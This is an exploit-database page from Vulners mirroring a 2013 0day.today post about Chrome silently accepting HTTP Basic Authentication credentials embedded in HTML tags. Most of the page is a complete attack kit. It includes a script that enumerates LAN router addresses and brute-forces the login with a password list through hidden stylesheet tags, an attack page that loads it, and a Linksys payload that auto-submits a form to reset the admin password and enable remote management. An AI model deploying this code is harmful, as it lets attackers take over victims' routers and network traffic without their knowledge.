Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Google Chrome Silent HTTP Authentication

🗓️ 11 Feb 2013 00:00:00Reported by T355Type 
zdt
 zdt🔗 0day.today👁 152 Views

Google Chrome fails to recognize HTTP Basic Authentication, allowing silent login to routers and potential control over the entire network

Code
VULNERABILITY DETAILS
The latest version of Google Chrome (Tested on Version 24.0.1312.57)
fails to properly recognize HTTP Basic Authentication when injected in
various HTML tags. As a result of this behavior Chrome will not alert
the user when HTTP Basic Authentication is taking place or when
credentials are rejected. This behavior is particularly concerning
with respect to small office and home routers. Such devices are easily
brute forced using this method. Many of these devices have the default
password enabled which brings me to part II of this bug. Silent HTTP
Authentication allows the attacker to log into the router and change
settings with no alerts and or warnings issued by Chrome. The end
result allows an attacker to brute force the router login, connect to
the router, enable remote administration and of course control all
information on the entire network via DNS attacks etc.
REPRODUCTION CASE
I have attached the following files:
 
=======================================
sploit.txt - Indicates the buggy code.
Bug 1 - (Stylesheet Method)
<link rel="stylesheet" href="http://admin:[email protected]/" type="text/css" />

Bug 2 - (IMG Method)
<img src="http://admin:[email protected]" />

Bug 3 - (iFrame Method)
var iframe = document.getElementById("loginFrame");
iframe.src = "http://admin:[email protected]168.1.1";

=======================================
jquery.js - Used for real world scenario but not needed for bug.
jQuery v1.7.1 jquery.com 

=======================================
brute.js - Real world attack scenario for this bug.
//Settings
victim = "192.168.1.1";
user = "admin";

//Dont touch these
count = 1;
enabled = false;
payload = false;
passFound = 0;

//Password Array
pass = new Array("","admin","password","1234","netgear1","netgear","optimum","password","test","linksys","tech","123456","123456","password","123456789","welcome","ninja","abc123","qwerty","12345678","princess","sunshine","iloveyou","welcome","jesus","babygirl","12345","rockyou","Nichole","Daniel","money","monkey","freedom","654321","michael","1234567","love","master","ginger","11111","1234","dragon","batman","baseball","buster","starwars","dallas","summer","access","killer","mustang","2000","soccer","ranger","696969","tigger","pass","shadow","Jennifer","letmein","Joshua","merlin","Robert","hockey","666666","orange","jordan","trustno1","superman","computer","123123","thunder","internet","lifehack","0","gizmodo","whatever","cheese","nintendo","f You","blahblah","passwOrd","gawker","Password","pokemon","michelle","pepper","kotaku","F#ck","P#ssy","6969","1111","a##hole","golfer","austin","biteme","cowboy","silver","F#cker","bigdog","bl#wjob","yellow","131313","hello","please","scooter","dick","iwantu","sexy","panties","hammer","yankees");
var length = pass.length,
element = null;

function crackPass() {
	for (var i = 0; i < length; i++) {
		if(passFound == 0) {
			password = pass[i];
			jQuery('head').append('<link rel="stylesheet" onload="logPW(\'' + password + '\')" href="http://admin:' + password + '@' + victim + '" type="text/css" />');
		}
	}
}

function logPW(password) {
	if(passFound == 0) {
		alert("Your Router Passowrd is: " + password);
		//Log Into Router
		var iframe = document.getElementById("loginFrame");
		setTimeout(function() { iframe.src = "http://" + user + ":" + password + "@" + victim; }, 500);
		setTimeout(function() { window.location = "http://" + victim; }, 2000);
	}
	passFound = 1;
}


//Deploy Malicous Payload to Router (Enable Remote Administration)
function dropLoad(){
	var iframe = document.getElementById("loginFrame");
	setTimeout(function() {  iframe.src = "attack.php?ip=" + victim; }, 100);
	console.log("dropping payload");
}

//Enumeration Module Used to Discover Router Local IP Address
iplist = new Array("192.168.1.1","10.0.1.1","10.0.0.1","192.168.1.220","192.168.2.1","10.1.1.1","192.168.11.1","192.168.0.1","192.168.0.30","192.168.0.50","192.168.1.30","192.168.1.50","192.168.10.1","192.168.20.1","192.168.30.1","192.168.62.1","192.168.100.1","192.168.102.1","192.168.1.254","192.168.0.227","10.0.0.138","192.168.123.254","192.168.4.1","10.0.0.2");
counter = 0;
 
function enumerateRouter() {
   if(counter !== iplist.length){
        var ip = iplist[counter];
        counter++;
	} else {
		return false;
	}
	
	var xhr = new XMLHttpRequest();
	xhr.onreadystatechange = function () {
		if (xhr.readyState == 4 && xhr.status == 200) {
			//alert("success");
		}
	};

	xhr.open("POST", "http://" + ip, true);
	xhr.setRequestHeader("Content-type", "application/json; charset=utf-8");
	xhr.timeout = 1000;
	xhr.ontimeout = function () { console.log(ip + " FAIL"); enumerateRouter(); }
	xhr.onerror = function () { console.log(ip + " MATCH"); victim = ip; crackPass();  }
	xhr.send();
}

=======================================
index.html - HTML Attack Page
<!DOCTYPE html>
<html>
<head>
<script type='text/javascript' src='jquery.js?ver=1.7.1'></script>
<script type='text/javascript' src='brute.js'></script>
</head>
<body onload="enumerateRouter()">
<iframe name="loginFrame" id="loginFrame" src="about:blank" style="display:none;"></iframe>
</body>
</html>

=======================================
attack.php - Payload file for Linksys Routers.
<? 
//collect some info
$ip = $_GET["ip"]; 
$wan = $_SERVER['REMOTE_ADDR'];
?>

<html>
<head>
</head>
<body onload="sendPayload()">
	<FORM id=password name=password action="http://<? echo $ip; ?>/manage.tri" method=post>
	<input type=hidden name=remote_mgt_https value=0>
	<input type=hidden name=http_enable value=1>
	<input type=hidden name=https_enable value=0>
	<input type=hidden name=PasswdModify value=0>
	<input type=hidden name=http_passwd value=d6nw5v1x2pc7st9m>
	<input type=hidden name=http_passwdConfirm value=d6nw5v1x2pc7st9m>
	<input type=hidden name=_http_enable value=1>
	<input type=hidden name=web_wl_filter value=1>
	<input type=hidden name=remote_management value=1>
	<input type=hidden name=http_wanport value=5555>
	<input type=hidden name=upnp_enable value=1>
	<input type=hidden name=layout value=en>
	<input type="submit" value="submit"> 
	</FORM>
	
	<script>
	function sendPayload(){
		document.password.submit();
	}
	</script>
</body>
</html>

#  0day.today [2018-04-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Feb 2013 00:00Current
7.1High risk
Vulners AI Score7.1
google chromehttp basic authenticationsilent loginroutersnetwork control
152